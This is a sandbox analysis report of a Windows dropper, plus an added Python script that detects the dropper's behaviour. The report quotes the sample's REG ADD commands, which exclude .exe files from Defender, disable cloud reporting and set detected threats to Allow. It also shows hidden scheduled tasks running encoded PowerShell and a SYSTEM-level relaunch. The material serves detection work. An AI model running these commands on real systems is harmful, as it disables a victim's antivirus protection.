Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
ReversingLabs: Detection: 51% |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
ReversingLabs: Detection: 51% |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe |
ReversingLabs: Detection: 51% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040553A FindFirstFileA, |
1_2_0040553A |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
1_2_004055DE |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Source: powershell.exe, 00000018.00000002.420007208.00000173FD929000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.430262427.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: Install.exe, 00000005.00000002.484866347.0000000001ABA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Process created: Commandline size = 3260 |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicySMsYe |
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004162A6 |
1_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040E5A5 |
1_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004126B0 |
1_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00403A01 |
1_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00418EF1 |
1_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00418FCB |
1_2_00418FCB |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 24_2_00007FF9A5641988 |
24_2_00007FF9A5641988 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_00E4CA48 |
31_2_00E4CA48 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_00E48BA8 |
31_2_00E48BA8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_00E48BB0 |
31_2_00E48BB0 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_067DB790 |
31_2_067DB790 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068DF0E8 |
31_2_068DF0E8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068D1000 |
31_2_068D1000 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068D1010 |
31_2_068D1010 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068E8658 |
31_2_068E8658 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068DB4F9 |
31_2_068DB4F9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 179 times |
|
Source: file.exe, 00000001.00000000.284047943.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |
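The process chain above is the whole technique in order: forfiles.exe is used to launch cmd.exe indirectly, cmd.exe runs REG ADD against HKLM\SOFTWARE\Policies\Microsoft\Windows Defender in both registry views (an "exe" extension exclusion, SpyNetReporting=0 to switch off cloud reporting, and ThreatIDDefaultAction=6, Defender's "Allow" action, for each listed threat ID), a short-lived task runs an encoded PowerShell one-liner that decodes (base64 over UTF-16LE) to `start-process -WindowStyle Hidden gpupdate.exe /force` so the freshly written gpt.ini and policy values take effect, and a second task re-launches the dropped binary from the user's Temp directory as SYSTEM. The script below is an added example, not part of the report or of the sample; it parses these command lines as the report prints them (the `&` before each second REG ADD is cmd's command chaining), decodes the -EncodedCommand payload and flags each of those behaviours. Rule names, messages and the shortening of the last sample line to its first two REG ADD segments are this example's own choices.

```python
"""Triage of "Process created:" command lines from a sandbox report.

Added example, not part of the Joe Sandbox report: parses command lines as
the report prints them (nested quotes escaped with a backslash), decodes
PowerShell -EncodedCommand payloads (base64 over UTF-16LE) and flags Windows
Defender policy tampering and suspicious scheduled tasks. SAMPLE_LINES are
copied from the report; the last is shortened to two REG ADD segments.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"

# Sub-keys under the Defender policy key and what a REG ADD to them means.
# For ThreatIDDefaultAction, data 6 is Defender's "Allow" action.
TAMPER_RULES = {
    r"\exclusions\extensions": "extension exclusion added",
    r"\exclusions\paths": "path exclusion added",
    r"\spynet": "cloud (MAPS) reporting setting changed",
    r"\threats\threatiddefaultaction": "per-threat default action overridden",
}

# REG ADD "<key>" /f /v "<name>" /t <type> /d <data> [/reg:32|64]; a segment
# ends at whitespace, ';', '&', a quote or end of line (cmd chains with '&').
REG_ADD_RE = re.compile(
    r'REG ADD\s+\\?"(?P<key>[^"]*?)\\?"\s+/f\s+/v\s+\\?"(?P<name>[^"]*?)\\?"'
    r'\s+/t\s+(?P<type>REG_\w+)\s+/d\s+(?P<data>\S+?)'
    r'(?:\s+/reg:(?P<view>32|64))?(?=[\s;&"\\]|$)',
    re.IGNORECASE,
)
# powershell.exe accepts -EncodedCommand, -enc, -ec and -e for the same switch.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
CREATE_RE = re.compile(r"schtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)
RU_RE = re.compile(r'/ru\s+"?(?P<user>[^"\s]+)', re.IGNORECASE)
TR_RE = re.compile(r'/tr\s+"(?P<tr>.*)"', re.IGNORECASE)  # greedy: /TR runs to the last quote
GPUPDATE_RE = re.compile(r"gpupdate(?:\.exe)?\s+/force", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def decode_encoded_command(cmdline: str) -> str | None:
    """Decoded -EncodedCommand payload, or None when absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def defender_tampering(text: str) -> list[Finding]:
    """One finding per REG ADD segment that writes under the Defender policy key."""
    out = []
    for m in REG_ADD_RE.finditer(text):
        key = m["key"].lower()
        if not key.startswith(DEFENDER_POLICY):
            continue
        sub = key[len(DEFENDER_POLICY):]
        what = next((v for k, v in TAMPER_RULES.items() if sub.startswith(k)),
                    "Defender policy value written")
        view = f" (/reg:{m['view']})" if m["view"] else ""
        out.append(Finding("defender-policy", f"{what}: {m['name']}={m['data']}{view}"))
    return out


def task_findings(cmdline: str) -> list[Finding]:
    """Flag schtasks /CREATE calls that run as SYSTEM or whose action lives in a user Temp dir."""
    if not CREATE_RE.search(cmdline):
        return []
    ru, tr = RU_RE.search(cmdline), TR_RE.search(cmdline)
    user = ru["user"] if ru else "<caller>"
    action = tr["tr"] if tr else ""
    out = []
    if user.upper() == "SYSTEM":
        out.append(Finding("task-as-system", f"task runs as SYSTEM: {action}"))
    if re.search(r"\\appdata\\local\\temp\\", action, re.IGNORECASE):
        out.append(Finding("task-temp-binary", "task action lives in a user Temp directory"))
    return out


def triage(cmdline: str) -> list[Finding]:
    """Every check on one command line, including its decoded PowerShell payload."""
    findings = defender_tampering(cmdline) + task_findings(cmdline)
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(Finding("encoded-powershell", f"decoded: {decoded}"))
        findings += defender_tampering(decoded)  # the payload may itself carry REG ADD
    if GPUPDATE_RE.search(cmdline) or (decoded and GPUPDATE_RE.search(decoded)):
        findings.append(Finding("gpupdate-force", "forces a Group Policy refresh, which applies the policy keys written above"))
    return findings


# Copied from the report's "Process created:" entries (trailing separators dropped).
SAMPLE_LINES = [
    r'C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&',
    r'C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    r'C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F',
    r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64"',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(line[:72] + "...")
        for f in triage(line):
            print(f"    [{f.rule}] {f.detail}")
```

Run as a script it prints the findings per sample line. The regexes are written for the report's rendering (escaped nested quotes, `&` and `;` chaining inside one line); raw EDR telemetry usually delivers each reg.exe invocation as its own event, so the escaping can be relaxed there. On a live host the same three changes are visible through Get-MpPreference (ExclusionExtension, MAPSReporting and the ThreatIDDefaultAction_Ids / ThreatIDDefaultAction_Actions pair), which is the quickest check that the policy writes actually took effect.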